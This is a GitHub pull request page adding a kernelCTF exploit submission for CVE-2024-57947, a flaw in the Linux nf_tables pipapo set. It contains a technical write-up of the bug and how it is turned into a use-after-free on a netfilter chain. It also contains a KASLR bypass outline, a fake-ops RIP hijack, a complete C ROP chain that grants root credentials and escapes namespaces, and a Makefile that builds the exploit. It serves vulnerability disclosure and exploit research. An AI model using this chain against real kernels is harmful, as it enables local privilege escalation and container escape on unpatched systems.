Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add kernelCTF CVE-2024-57947_mitigation #162

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
281 changes: 281 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-57947_mitigation/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,281 @@
# Overview

The vulnerability is caused by incorrect initialization of the `res_map` in the get/lookup function of the `nft_pipapo_set`.

```c
static struct nft_pipapo_elem *pipapo_get(const struct net *net,
const struct nft_set *set,
const u8 *data, u8 genmask)
{
struct nft_pipapo_elem *ret = ERR_PTR(-ENOENT);
struct nft_pipapo *priv = nft_set_priv(set);
struct nft_pipapo_match *m = priv->clone;
unsigned long *res_map, *fill_map = NULL;
struct nft_pipapo_field *f;
int i;

res_map = kmalloc_array(m->bsize_max, sizeof(*res_map), GFP_ATOMIC);
if (!res_map) {
ret = ERR_PTR(-ENOMEM);
goto out;
}

fill_map = kcalloc(m->bsize_max, sizeof(*res_map), GFP_ATOMIC);
if (!fill_map) {
ret = ERR_PTR(-ENOMEM);
goto out;
}

memset(res_map, 0xff, m->bsize_max * sizeof(*res_map)); // [1]

nft_pipapo_for_each_field(f, i, m) {
bool last = i == m->field_count - 1;
int b;

/* For each bit group: select lookup table bucket depending on
* packet bytes value, then AND bucket value
*/
if (f->bb == 8)
pipapo_and_field_buckets_8bit(f, res_map, data); // [2]
else if (f->bb == 4)
pipapo_and_field_buckets_4bit(f, res_map, data);
else
BUG();

data += f->groups / NFT_PIPAPO_GROUPS_PER_BYTE(f);

/* Now populate the bitmap for the next field, unless this is
* the last field, in which case return the matched 'ext'
* pointer if any.
*
* Now res_map contains the matching bitmap, and fill_map is the
* bitmap for the next field.
*/
next_match:
b = pipapo_refill(res_map, f->bsize, f->rules, fill_map, f->mt, // [3]
last);
if (b < 0)
goto out;

if (last) {
if (nft_set_elem_expired(&f->mt[b].e->ext) ||
(genmask &&
!nft_set_elem_active(&f->mt[b].e->ext, genmask)))
goto next_match;

ret = f->mt[b].e;
goto out;
}

data += NFT_PIPAPO_GROUPS_PADDING(f);

/* Swap bitmap indices: fill_map will be the initial bitmap for
* the next field (i.e. the new res_map), and res_map is
* guaranteed to be all-zeroes at this point, ready to be filled
* according to the next mapping table.
*/
swap(res_map, fill_map); // [4]
}
```

In the `pipapo_get()`, the `res_map` is allocated and initialized to 1 by `m->bsize_max * sizeof(*res_map)` [1]. The `res_map` is then used in the `pipapo_and_field_buckets_8bit()` [2] and `pipapo_refill()` [3]. These functions update `res_map` by performing an operation on the current field. The operations are performed on the current field by `f->bsize`, the size of the current field. The result of the operation on the current field is then passed to `fill_map()` using the `swap()` [4]. If `f->bsize` is smaller than `m->bsize_max`, uncomputed bit values initialized to 1 are passed to `fill_map`. This will result in an invalid match and return an invalid set element.

```c
static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
const struct nft_set_elem *elem)
{
struct nft_pipapo *priv = nft_set_priv(set);
struct nft_pipapo_match *m = priv->clone;
struct nft_pipapo_elem *e = elem->priv;
int rules_f0, first_rule = 0;
const u8 *data;

data = (const u8 *)nft_set_ext_key(&e->ext);

e = pipapo_get(net, set, data, 0);
if (IS_ERR(e))
return;
```

When a set element is deleted, the element is first deactivated and then removed from the set by calling `nft_pipapo_remove()`. However, the vulnerability causes the set element to remain in the set instead of being removed from the set.

```c
static void nft_map_deactivate(const struct nft_ctx *ctx, struct nft_set *set)
{
struct nft_set_iter iter = {
.genmask = nft_genmask_next(ctx->net),
.fn = nft_mapelem_deactivate,
};

set->ops->walk(ctx, set, &iter);
WARN_ON_ONCE(iter.err);

nft_map_catchall_deactivate(ctx, set);
}
```

Then, when the set is deleted, `nft_map_catchall_deactivate()` is called on the elements that remained in the set, decrementing the reference count of the associated objects. As a result, the element that are not removed in the `nft_pipapo_remove()` is deactivated twice.

We can trigger a UAF from this vulnerability as follows. First, create a victim set and a victim chain, and create an immediate expr pointing to the victim chain to create a dangling pointer. At this point, the victim chain's reference count (`nft_chain->use`) is set to 1. We then add a number of random set elements to this victim set. At this point, we look for the element that triggers the vulnerability among the added elements and point it to the victim chain. Now, the reference count of the victim chain becomes 2. Next, we trigger the vulnerability by deleting a randomly selected set element. When the vulnerability is triggered, the victim chain's reference count is decremented twice to zero. Since the reference count of the victim chain is zero, the chain can be free. As a result, the victim chain is left as a dangling pointer in the immediate expr.

# KASLR Bypass and Information Leak

We used a timing side channel attack to leak the kernel base, and created a fake ops in the non-randomized CPU entry area (CVE-2023-0597) without leaking the heap address.

# RIP Control

```c
struct nft_chain {
struct nft_rule_blob __rcu *blob_gen_0;
struct nft_rule_blob __rcu *blob_gen_1;
struct list_head rules;
struct list_head list;
struct rhlist_head rhlhead;
struct nft_table *table;
u64 handle;
u32 use;
u8 flags:5,
bound:1,
genmask:2;
char *name;
u16 udlen;
u8 *udata;

/* Only used during control plane commit phase: */
struct nft_rule_blob *blob_next;
};
```

When the vulnerability is triggered, the freed `chain->blob_gen_0` can be accessed via `immediate expr`. We leave the chain freed and spray an object to create a fake blob in `blob_gen_0`.

```c
unsigned int
nft_do_chain(struct nft_pktinfo *pkt, void *priv)
{
...
do_chain:
if (genbit)
blob = rcu_dereference(chain->blob_gen_1);
else
blob = rcu_dereference(chain->blob_gen_0);

rule = (struct nft_rule_dp *)blob->data;
last_rule = (void *)blob->data + blob->size;
next_rule:
regs.verdict.code = NFT_CONTINUE;
for (; rule < last_rule; rule = nft_rule_next(rule)) {
nft_rule_dp_for_each_expr(expr, last, rule) {
if (expr->ops == &nft_cmp_fast_ops)
nft_cmp_fast_eval(expr, &regs);
else if (expr->ops == &nft_cmp16_fast_ops)
nft_cmp16_fast_eval(expr, &regs);
else if (expr->ops == &nft_bitwise_fast_ops)
nft_bitwise_fast_eval(expr, &regs);
else if (expr->ops != &nft_payload_fast_ops ||
!nft_payload_fast_eval(expr, &regs, pkt))
expr_call_ops_eval(expr, &regs, pkt);

if (regs.verdict.code != NFT_CONTINUE)
break;
}
```

```c
static void expr_call_ops_eval(const struct nft_expr *expr,
struct nft_regs *regs,
struct nft_pktinfo *pkt)
{
#ifdef CONFIG_RETPOLINE
unsigned long e = (unsigned long)expr->ops->eval;
#define X(e, fun) \
do { if ((e) == (unsigned long)(fun)) \
return fun(expr, regs, pkt); } while (0)

X(e, nft_payload_eval);
X(e, nft_cmp_eval);
X(e, nft_counter_eval);
X(e, nft_meta_get_eval);
X(e, nft_lookup_eval);
X(e, nft_range_eval);
X(e, nft_immediate_eval);
X(e, nft_byteorder_eval);
X(e, nft_dynset_eval);
X(e, nft_rt_get_eval);
X(e, nft_bitwise_eval);
#undef X
#endif /* CONFIG_RETPOLINE */
expr->ops->eval(expr, regs, pkt);
}
```

`chain->blob_gen_0` is used in `nft_do_chain`, and `expr->ops->eval` is called to evaluate the expression in `expr_call_ops_eval`. We set the ops of the fake expr to the CPU entry area to control the RIP. We allocate the fake blob object larger than 0x2000 to use page allocator.

# Post-RIP

The ROP payload is stored in `chain->blob_gen_0` which is allocated by page allocator.

When `eval()` is called, `RBX` points to `chain->blob_gen_0+0x10`, which is the beginning of the `nft_expr` structure.

```c
void rop_chain(uint64_t* data){
int i = 0;

// nft_rule_blob.size > 0
data[i++] = 0x100;
// nft_rule_blob.dlen > 0
data[i++] = 0x100;

// fake ops addr
data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);

// current = find_task_by_vpid(getpid())
data[i++] = kbase + POP_RDI_RET;
data[i++] = getpid();
data[i++] = kbase + FIND_TASK_BY_VPID;

// current += offsetof(struct task_struct, rcu_read_lock_nesting)
data[i++] = kbase + POP_RSI_RET;
data[i++] = RCU_READ_LOCK_NESTING_OFF;
data[i++] = kbase + ADD_RAX_RSI_RET;

// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
data[i++] = kbase + POP_RCX_RET;
data[i++] = 0;
data[i++] = kbase + MOV_RAX_RCX_RET;

// Bypass "schedule while atomic": set oops_in_progress = 1
data[i++] = kbase + POP_RDI_RET;
data[i++] = 1;
data[i++] = kbase + POP_RSI_RET;
data[i++] = kbase + OOPS_IN_PROGRESS;
data[i++] = kbase + MOV_RSI_RDI_RET;

// commit_creds(&init_cred)
data[i++] = kbase + POP_RDI_RET;
data[i++] = kbase + INIT_CRED;
data[i++] = kbase + COMMIT_CREDS;

// find_task_by_vpid(1)
data[i++] = kbase + POP_RDI_RET;
data[i++] = 1;
data[i++] = kbase + FIND_TASK_BY_VPID;

data[i++] = kbase + POP_RSI_RET;
data[i++] = 0;

// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
data[i++] = kbase + MOV_RDI_RAX_RET;
data[i++] = kbase + POP_RSI_RET;
data[i++] = kbase + INIT_NSPROXY;
data[i++] = kbase + SWITCH_TASK_NAMESPACES;

data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
data[i++] = 0;
data[i++] = 0;
data[i++] = _user_rip;
data[i++] = _user_cs;
data[i++] = _user_rflags;
data[i++] = _user_sp;
data[i++] = _user_ss;
}
```
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
- Requirements:
- Capabilities: CAP_NET_ADMIN
- Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES
- User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c4287f62044 (nf_tables: Add set type for arbitrary concatenation of ranges)
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=791a615b7ad2258c560f91852be54b0480837c93 (netfilter: nf_set_pipapo: fix initial map fill)
- Affected Version: v5.6 - v6.10-rc7
- Affected Component: net/netfilter
- Cause: Use-After-Free
- Syscall to disable: disallow unprivileged username space
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-57947
- Description: In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_set_pipapo: fix initial map fill The initial buffer has to be inited to all-ones, but it must restrict it to the size of the first field, not the total field size. After each round in the map search step, the result and the fill map are swapped, so if we have a set where f->bsize of the first element is smaller than m->bsize_max, those one-bits are leaked into future rounds result map. This makes pipapo find an incorrect matching results for sets where first field size is not the largest. Followup patch adds a test case to nft_concat_range.sh selftest script. Thanks to Stefano Brivio for pointing out that we need to zero out the remainder explicitly, only correcting memset() argument isn't enough.
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
LIBMNL_DIR = $(realpath ./)/libmnl_build
LIBNFTNL_DIR = $(realpath ./)/libnftnl_build

exploit:
gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include -static -s

prerequisites: libmnl-build libnftnl-build

libmnl-build : libmnl-download
tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install

libnftnl-build : libmnl-build libnftnl-download
tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install

libmnl-download :
mkdir $(LIBMNL_DIR)
wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2

libnftnl-download :
mkdir $(LIBNFTNL_DIR)
wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz

run:
./exploit

clean:
rm -rf $(LIBMNL_DIR)
rm -rf $(LIBNFTNL_DIR)
rm -f exploit
Binary file not shown.
Loading